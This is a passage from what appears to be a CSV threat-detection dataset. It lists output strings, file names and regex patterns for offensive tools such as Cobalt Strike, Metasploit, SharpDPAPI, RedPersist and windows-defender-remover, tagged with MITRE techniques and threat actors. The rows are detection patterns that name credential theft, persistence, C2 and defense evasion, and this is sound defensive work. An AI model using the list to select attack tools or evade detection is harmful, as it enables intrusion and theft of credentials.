Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","20081" "*] Startup Persistence 
created*",".{0,1000}\]\sStartup\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","20082" "*] Stopping LLMNR spoofing""*",".{0,1000}\]\sStopping\sLLMNR\sspoofing\"".{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","#content","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","20083" "*] TARGET DLL IS NOT VULNERABLE TO *",".{0,1000}\]\sTARGET\sDLL\sIS\sNOT\sVULNERABLE\sTO\s.{0,1000}","offensive_tool_keyword","rattler","Automated DLL Enumerator","T1174 - T1574.007","TA0005","N/A","N/A","Discovery","https://github.com/sensepost/rattler","1","0","N/A","N/A","9","6","531","135","2017-12-21T18:01:09Z","2016-11-28T12:35:44Z","20084" "*] TeamFiltration V3.5.3 PUBLIC*",".{0,1000}\]\sTeamFiltration\sV3\.5\.3\sPUBLIC.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","0","N/A","N/A","10","10","1132","128","2025-04-10T13:48:00Z","2022-06-28T00:00:28Z","20085" "*] to download void.zip using BitsTransfer*",".{0,1000}\]\sto\sdownload\svoid\.zip\susing\sBitsTransfer.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - 
T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","script content","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","20086" "*] Token does NOT have SE_ASSIGN_PRIMARY_NAME* using CreateProcessAsWithToken() for launching:*",".{0,1000}\]\sToken\sdoes\sNOT\shave\sSE_ASSIGN_PRIMARY_NAME.{0,1000}\susing\sCreateProcessAsWithToken\(\)\sfor\slaunching\:.{0,1000}","offensive_tool_keyword","TokenStealer","stealing Windows tokens","T1134 - T1055","TA0003 - TA0004","N/A","N/A","Credential Access","https://github.com/decoder-it/TokenStealer","1","0","#content","N/A","10","2","164","29","2023-10-25T14:08:57Z","2023-10-24T13:06:37Z","20087" "*] Triage SCCM Secrets*",".{0,1000}\]\sTriage\sSCCM\sSecrets.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","20088" "*] Triggered Meterpreter oneliner on *",".{0,1000}\]\sTriggered\sMeterpreter\soneliner\son\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Exploitation 
tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","20089" "*] use the aes key from the beacon's online info to encrypt transfer data (base64 format*",".{0,1000}\]\suse\sthe\saes\skey\sfrom\sthe\sbeacon\'s\sonline\sinfo\sto\sencrypt\stransfer\sdata\s\(base64\sformat.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","20090" "*] use the public key 
from .beacon_keys to decrypt the beacon's online info*",".{0,1000}\]\suse\sthe\spublic\skey\sfrom\s\.beacon_keys\sto\sdecrypt\sthe\sbeacon\'s\sonline\sinfo.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike's Beacon in Go","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/darkr4y/geacon","1","0","N/A","N/A","10","10","1189","206","2020-10-02T10:34:37Z","2020-02-14T14:01:29Z","20091" "*] User can impersonate the following logins: *",".{0,1000}\]\sUser\scan\simpersonate\sthe\sfollowing\slogins\:\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 
(OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","20092" "*] UserInitMprLogonScript Persistence created*",".{0,1000}\]\sUserInitMprLogonScript\sPersistence\screated.{0,1000}","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","N/A","10","3","215","33","2024-03-10T15:40:05Z","2023-08-13T22:10:46Z","20093" "*] Using KohPipe *",".{0,1000}\]\sUsing\sKohPipe\s\s\s\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - 
CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","0","#content","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","20094" "*] Will decrypt user masterkeys with NTLM hash: *",".{0,1000}\]\sWill\sdecrypt\suser\smasterkeys\swith\sNTLM\shash\:\s.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","20095" "*] Writing obfuscated payload to *",".{0,1000}\]\sWriting\sobfuscated\spayload\sto\s.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","20096" "*] Wrote hijack DLL to *",".{0,1000}\]\sWrote\shijack\sDLL\sto\s.{0,1000}","offensive_tool_keyword","cobaltstrike","cobaltstrike default content strings","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#content","N/A","10","10","N/A","N/A","N/A","N/A","20097" "*] You would like to generate .EXE using lauch4j? 
(y/n):*",".{0,1000}\]\sYou\swould\slike\sto\sgenerate\s\.EXE\susing\slauch4j\?\s\(y\/n\)\:.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","20098" "*]Spawning Process with Spoofed Parent*",".{0,1000}\]Spawning\sProcess\swith\sSpoofed\sParent.{0,1000}","offensive_tool_keyword","TokenPlayer","Manipulating and Abusing Windows Access Tokens","T1134 - T1484 - T1055 - T1078","TA0004 - TA0005 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S1ckB0y1337/TokenPlayer","1","0","N/A","N/A","10","3","274","45","2021-01-15T16:07:47Z","2020-08-20T23:05:49Z","20099" "*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","20103" "*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","20104" "*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) 
and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","20105" "*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","20106" "*_adAclOutput*.csv*",".{0,1000}_adAclOutput.{0,1000}\.csv.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","20107" "*_adAclOutput*.xlsx*",".{0,1000}_adAclOutput.{0,1000}\.xlsx.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","20108" "*_backdoor.exe*",".{0,1000}_backdoor\.exe.{0,1000}","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. 
shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","Exploitation tool","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","N/A","1","75","19","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z","20109" "*_backdoor.rb*",".{0,1000}_backdoor\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20110" "*_BloodHound.zip*",".{0,1000}_BloodHound\.zip.{0,1000}","offensive_tool_keyword","BloodHound","BloodHound is a single page Javascript web application. built on top of Linkurious. compiled with Electron. with a Neo4j database fed by a C# data collector. BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment. 
Attackers can use BloodHound to easily identify highly complex attack paths that would otherwise be impossible to quickly identify. Defenders can use BloodHound to identify and eliminate those same attack paths. Both blue and red teams can use BloodHound to easily gain a deeper understanding of privilege relationships in an Active Directory environment","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound","1","1","N/A","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","20111" "*_cobaltstrike*",".{0,1000}_cobaltstrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - 
EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20113" "*_dcsync.txt*",".{0,1000}_dcsync\.txt.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","20114" "*_DefenderRemover.exe*",".{0,1000}_DefenderRemover\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","20115" "*_DefenderRemover-x86.exe*",".{0,1000}_DefenderRemover\-x86\.exe.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","20116" "*_dns_hijack/*.js*",".{0,1000}_dns_hijack\/.{0,1000}\.js.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","20117" "*_dns_hijack/*.rb*",".{0,1000}_dns_hijack\/.{0,1000}\.rb.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","20118" "*_DomainPasswordAuditReport.html*",".{0,1000}_DomainPasswordAuditReport\.html.{0,1000}","offensive_tool_keyword","DPAT","Domain Password Audit Tool for Pentesters","T1003 - T1087 - T1110 - T1555","TA0006 - TA0004 - TA0002 - TA0005","N/A","N/A","Credential Access","https://github.com/clr2of8/DPAT","1","0","N/A","N/A","10","10","954","156","2022-06-24T21:41:43Z","2016-11-22T22:00:21Z","20119" "*_dump_users.lst*",".{0,1000}_dump_users\.lst.{0,1000}","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1087.002 - T1018 - T1482 - T1083","TA0007 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","5","5","465","54","2025-03-02T18:43:27Z","2018-10-22T18:21:44Z","20120" "*_DumpLSASecrets*",".{0,1000}_DumpLSASecrets.{0,1000}","offensive_tool_keyword","PWDumpX","PWDumpX tool allows a user with administrative privileges to retrieve the encrypted password hashes and LSA secrets from a Windows system. 
This tool can be used on the local system or on one or more remote systems.","T1003.001 - T1555.003 - T1077","TA0006 - TA0008","N/A","N/A","Credential Access","https://packetstormsecurity.com/files/download/52580/PWDumpX.zip","1","0","#content","N/A","10","8","N/A","N/A","N/A","N/A","20121" "*_enum_vault_creds*",".{0,1000}_enum_vault_creds.{0,1000}","offensive_tool_keyword","crackmapexec","crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","20122" "*_EvilClippy.*",".{0,1000}_EvilClippy\..{0,1000}","offensive_tool_keyword","EvilClippy","A cross-platform assistant for creating malicious MS Office documents","T1566.001 - T1059.001 - T1204.002","TA0004 - TA0002","N/A","N/A","Phishing","https://github.com/outflanknl/EvilClippy","1","0","N/A","N/A","10","10","2165","402","2023-12-27T12:37:47Z","2019-03-26T12:14:03Z","20123" "*_execve_binsh.s*",".{0,1000}_execve_binsh\.s.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. 
payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20124" "*_find_sharpgen_dll*",".{0,1000}_find_sharpgen_dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - 
